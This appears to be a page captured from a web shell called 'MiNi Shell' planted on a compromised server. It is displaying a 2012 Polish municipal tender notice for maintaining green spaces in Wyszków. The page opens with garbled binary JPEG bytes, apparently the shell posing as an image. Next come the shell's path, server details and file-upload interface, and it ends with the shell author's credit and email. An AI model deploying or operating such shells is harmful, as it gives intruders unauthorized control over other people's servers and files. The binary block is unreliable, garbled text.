JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121213/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121213/508972-N-2012.html

<p class="kh_header"><b>Wyszków: Utrzymanie zieleni na terenie miasta</b><br>
<b>Numer ogłoszenia: 508972 - 2012; data zamieszczenia: 13.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wyszków , Aleja Róż 2, 07-200 Wyszków, woj. mazowieckie, tel. 029 7424201, faks 029 7424209.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wyszkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie zieleni na terenie miasta.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje:
1.	Koszenie trawników (w tym : zgrabienie skoszonej trawy, pozbieranie nieczystości widocznych po wykoszeniu, zamiecenie skoszonej trawy z chodników i jezdni -prace porządkowe należy wykonywać od razu po skoszeniu trawnika, zabezpieczenie młodych drzewek przed uszkodzeniami podczas koszenia).
2.	Wygrabianie trawników ( liści) oraz usuniecie liści znajdujących się przy krawężniku  lub chodniku) i wywiezienie .
3.	Cięcia pielęgnacyjne drzew (z uporządkowaniem terenu)
4.	Cięcia pielęgnacyjne  żywopłotów ( z uporządkowaniem terenu)
5.	Odchwaszczanie żywopłotów
6.	Założenie i pielęgnacja kwietników sezonowych (w tym: przygotowanie gruntu pod nasadzenia, podlewanie, zasilanie nawozami mineralnymi, pielenie, obcinanie trawników przy rabatach, przycinanie i usuwanie przekwitniętych kwiatostanów i liści , dosadzanie sadzonek, które mogą zostać uszkodzone przez warunki atmosferyczne, zwalczanie szkodników poprzez odpowiednie  opryski, odchwaszczanie, przygotowanie gruntu na okres zimowy.
a)	 obsadzenie kwietników I zmianą kwiatów - 65  m2 - 32 szt-m2  - bratki duże : przy ulicach:
- ul. Białostocka przy rondzie,
- ul. Dworcowa przy Matejki 
b)	 obsadzenie kwietników II zmianą kwiatów -  470 m2 -32 szt-m2  przy ulicach: 
-  ul. Białostocka przy rondzie - begonia , obwódka -smagliczka,
-  ul. Dworcowa przy Matejki - aksamitka , obwódka mrozy,  
Po przekwitnięciu tulipanów
- ul. 3 Maja - Kościuszki -  begonia 
- ul. Sowińskiego   powojnik wielokwiatowy  (10 szt -m2)
- ul. Sowińskiego -Pułtuska przy pomniku - szałwia, smagliczka
- ul. Sowińskiego przy rondzie  begonia  
- ul. Sowińskiego przy Prostej ( w murkach) begonia różowa czerwona, aksamitka żółta, 
- ul. Okrzei - aksamitka , smagliczka
c)   obsadzenie kwietników wielopoziomowych -sunsatia zwisająca, pelargonia zwisająca pełna (podwójna),  
- ul. Geodetów przy hali sportowej i  ul. Prostej przy Hutniku 
d)  nasadzenie kwiatów w donicach (po 3 szt w doniczce) i zwieszenie na istniejących uchwytach  umocowanych na słupach oświetlenia ulicznego przy ul. Gen. Józefa Sowińskiego i ul.  Gen. Wincentego Kowalskiego (55 latarni po 3 uchwyty na każdej) - surfinia, pelargonia zwisająca pełna (podwójna) w środku euphorbia -gipsówka. 
W tym obsadzenie waz  
ul. Sowińskiego -11 Listopada - 12 szt surfinia 
ul. Sowińskiego przy fontannie 6 szt (okrągłe) surfinie lub sundarville czerwone, w środku euphorbia -gipsówka
ul. Pułtuska 2 szt , Pułtuska przy Daszyńskiego 1 szt, (podłużne) pelargonia zwisająca pełna ( czerwona ) lub surfinia, 
ul. Prosta przy Hutniku 2 szt (podłużne) pelargonia zwisająca pełna ( czerwona ) lub surfinia, 
ul. Joselewicza 7 szt  (podłużne) - pelargonia zwisająca pełna ( różowa) surfinia
Kamieńczyk 7 szt (podłużne) pelargonie, 
E)  wymiana ziemi 
7.  Założenie trawników 
8.  Nasadzenie drzew w pasie drogowym  -sumak octowiec, klon platanolistny, lipa drobnolistna, akacja, o skróconym pniu oraz  jednego świerku  syberyjskiego zielonego 5 letniego ( w tym : opalikowanie drzew i pielęgnacja w pierwszym okresie wegetacji -podlewanie, nawożenie, a  w przypadku uschnięcia dosadzenie drzewka). 
9.   Uzupełnienie brakujących palików przy posadzonych drzewkach.
10.  Konserwacja i drobne naprawy ławek (uzupełnienie brakujących elementów, usunięcie starych powłok malarskich, malowanie),
11.  Wycięcie drzew łącznie z usunięciem karp i uporządkowaniem terenu,
12.  Bieżące utrzymanie czystości na terenach zieleni i skwerach  - wg wykazu (tj. sprzątanie nieczystości stałych) odśnieżanie i posypywanie środkami wymienionymi w Rozporządzeniu Ministra Ochrony Środowiska z dnia 27 października 2005 r  w sprawie rodzajów i warunków stosowania środków, jakie mogą być używane na drogach publicznych, ulicach i placach (Dz. U. Nr 230 poz 1960/  alejek na skwerach oraz chodników przyległych, omiatanie alejek  -  Plac Zwycięstwa, ul. Pułtuska przy pomniku AK, ul. Kościuszki - Strażacka, ul Okrzei    (- alejki od wjazdu na dworzec PKS do stanowisk autobusowych)  Pielęgnacja istniejących kwietników, pielęgnacja krzewów przy ul. Sowińskiego,  Leśnej i Piłsudskiego, Białostockiej (nawożenie, odchwaszczanie, podlewanie, ciecia pielęgnacyjne, uzupełnienie- wyściółkowanie korą), 
13.   Koszenie trawników i wygrabianie skoszonej trawy, wygrabianie liści, co 10 dni ok. 21 000 m2, ( od maja do listopada) przy ulicach: Gen J. Sowińskiego (do  Dworcowej), Dworcowa, Matejki ( od Dworcowej do . Prostej), Prosta, Stefana Okrzei (od   Pułtuskiej do Dworcowej) oraz Okrzei PKS, 1 Maja, Kowalskiego, Pułtuska (od Daszyńskiego do Sowińskiego), 11 Listopada, Plac Zwycięstwa - teren po PKS, Strażacka ( skwer przy Warszawskiej)  -wykonanie prac powinno być każdorazowo potwierdzone przez zamawiającego. 
14. Zakupienie i ustawienie choinek (wysokości min. 7 mb)-  3 szt ,
15. Zakupienie i założenie dekoracji świątecznych na  choinki - 6 szt  - przy rondzie  ul. Sowińskiego, przy ul. Geodetów, Sikorskiego/ Piłsudskiego, Dworcowej/ I AWP,  przy  Placu Zwycięstwa (przy użyciu 100 żarówek na choinkę lub nitek świetlnych).
16. Zdjęcie dekoracji z choinek i wywiezienie ustawionych choinek.

Szacunkowe obmiary poszczególnych  elementów zamówienia zostały określone      w formularzu cenowym (załącznik do oferty)

II. Zasady realizacji przedmiotu zamówienia 
1.	Prace wykonywane będą każdorazowo po zleceniu przez Zamawiającego.  Zlecenie zawierało będzie wskazanie miejsca, określenie rodzaju prac oraz termin wykonania -  termin wykonania prac nie dłuższy  niż 5 dni roboczych od daty otrzymania zlecenia, 
2.	 Wykonawca zobowiązany jest niezwłocznie do zgłoszenia wykonanych robót celem dokonania odbioru.    
3.	Wykonywania prac w kamizelkach odblaskowych
4.	Zamawiający nie udziela zaliczek na poczet wykonania umowy. 
5.	Wykonawca przed przystąpieniem do realizacji usługi zobowiązany jest do uzyskania zezwolenia od Burmistrza Wyszkowa na odbieranie odpadów komunalnych od właścicieli nieruchomości, oraz ponoszenia opłat za utylizację odpadów.
6.	Częstotliwość wykonywania prac pielęgnacyjnych i porządkowych  ma zapewnić stały estetyczny wygląd miasta i powinna być dostosowana do warunków atmosferycznych oraz pór roku.   
7.	Istnieje możliwość doboru innych roślin po akceptacji Zamawiającego
Fakturowanie 
Faktury za wykonanie usług zgodnie z formularzem cenowym  wystawiane będą na koniec każdego miesiąca, termin płatności 14 dni od daty ich złożenia.
Podstawą do wystawienia faktury za dany miesiąc będą potwierdzone przez zamawiającego protokoły odbioru prac sporządzone każdorazowo po wykonaniu zlecenia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia Wykonawcy wybranemu w niniejszym postępowaniu zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień  w okresie 3 lat od udzielenia zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.31.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 3500 zł (trzy tysiące pięćset złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań. 
Oświadczenie Wykonawcy o spełnianiu warunku udziału w postepowaniu zgodnie z art. 22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie  dysponował potencjałem  technicznym  niezbędnym  do wykonania zamówienia tj.:
1)	 Kosiarka szer. min. 50 cm - 5 szt,
2)	Kosiarka samojezdna  ser. min. 90cm - 4szt.,
3)	Motokosy - 10 szt.,
4)	Dmuchawa spalinowa - szt. 2,
5)	Nożyce spalinowe - szt. 1,
6)	Ciągnik rolniczy z przyczepą lub samochód ciężarowy- szt. 1,
7)	Samochód dostawczy.
     Ocena tego warunku na podstawie oświadczenia Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań. 
Oświadczenie Wykonawcy o spełnianiu warunku udziału w postepowaniu zgodnie z art. 22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę  min. 100 000 zł. Ocena warunku  na podstawie złożonych dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty zawierający m.in. cenę za wykonanie zamówienia, termin realizacji zamówienia, oświadczenie o zapoznaniu z warunkami przetargu i warunkami przyszłej umowy oraz o przyjęciu tych warunków bez zastrzeżeń, informacją o Podwykonawcach.
2.	Formularz cenowy wg Formularza Nr 4. 
3.	Dowód wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne  zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy:
1)	Zmiany w określeniu stron umowy, o ile zasadność tej zmiany wynika z przepisów prawa na skutek np. połączenia, przekształcenia lub zmiany firmy bądź siedziby strony.
2)	Zmiany w zakresie ceny przedmiotu zamówienia, jeśli konieczność takiej zmiany jest skutkiem zmiany przepisów prawa w tym stawki VAT.
3)	Zmiany terminu realizacji umowy w przypadku przedłużającej się procedury o udzielenie zamówienia publicznego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wyszkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Wyszkowie
Aleja Róż 2
07-200 Wyszków
pok. 116A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.12.2012 godzina 11:00, miejsce: Urząd Miejski w Wyszkowie
Aleja Róż 2
07-200 Wyszków
pok. 145 Kancelaria Urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com